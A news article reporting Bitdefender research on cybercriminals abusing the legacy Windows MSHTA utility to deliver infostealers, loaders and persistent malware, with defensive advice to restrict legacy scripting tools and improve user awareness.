Experts Warn Microsoft Legacy Tool Is Being Abused To Launch Malware Campaigns

Cybercriminals are increasingly exploiting a legitimate legacy Windows tool to deliver malware, with researchers warning that Microsoft HTML Application Host, known as MSHTA, is being used in a growing number of attacks.

A new report from Bitdefender has found a rise in MSHTA-related activity since the start of 2026, with attackers using the tool to deploy infostealers, loaders and more persistent malware threats.

MSHTA is a legitimate Windows utility designed to run HTML Application files, known as HTAs. Unlike standard web pages, which open inside a browser, HTA files can interact directly with the Windows operating system and execute scripts with elevated privileges.

That capability has made the ageing tool attractive to cybercriminals.

According to Bitdefender, the increase in MSHTA-related activity appears more likely to reflect malicious use than a return to legitimate administrative adoption, particularly as normal use of the tool continues to decline.

Researchers said MSHTA is being abused across a wide range of cyber campaigns, from simple commodity malware attacks to more advanced and persistent threats.

At the simpler end, attackers are using MSHTA to deliver infostealers such as Amatera and LummaStealer, as well as loaders including CountLoader and Emmenthal. These tools are commonly used to steal credentials, collect sensitive data or install further malware on compromised systems.

Bitdefender also observed more complex campaigns involving threats such as ClipBanker and PurpleFox, showing that MSHTA remains useful to both opportunistic criminals and more sophisticated operators.

The researchers said the breadth of activity shows why defenders still need to pay attention to MSHTA. Rather than being tied to one malware family or one type of intrusion, it is being used across everything from basic malware delivery to longer-term compromise.

Security researchers say the trend reflects a broader problem for defenders: old and legitimate system utilities can be difficult to block outright, but they are increasingly being used by attackers to bypass security controls and run malicious scripts.

Because MSHTA is a trusted Windows component, malicious activity involving the tool may not always look suspicious at first glance. Attackers can use it to run code, download malware or launch scripts while hiding behind a legitimate process.

Bitdefender has urged organisations to reduce their exposure by restricting outdated scripting utilities such as mshta.exe and wscript.exe wherever possible.

The company also recommends replacing legacy scripting tools with modern alternatives, improving user awareness, and deploying layered security controls capable of detecting malicious scripts and suspicious command-line behaviour.

Users are also being warned not to download untrusted files, run unexpected commands or open suspicious attachments, particularly if they arrive through unsolicited emails or messages.

The findings highlight how even old software components can become modern attack tools when they remain enabled across business environments.

As malware campaigns continue to evolve, experts say organisations must look beyond obvious threats and pay closer attention to the legitimate tools attackers are quietly turning against them.

Photo Credit: DepositPhotos.com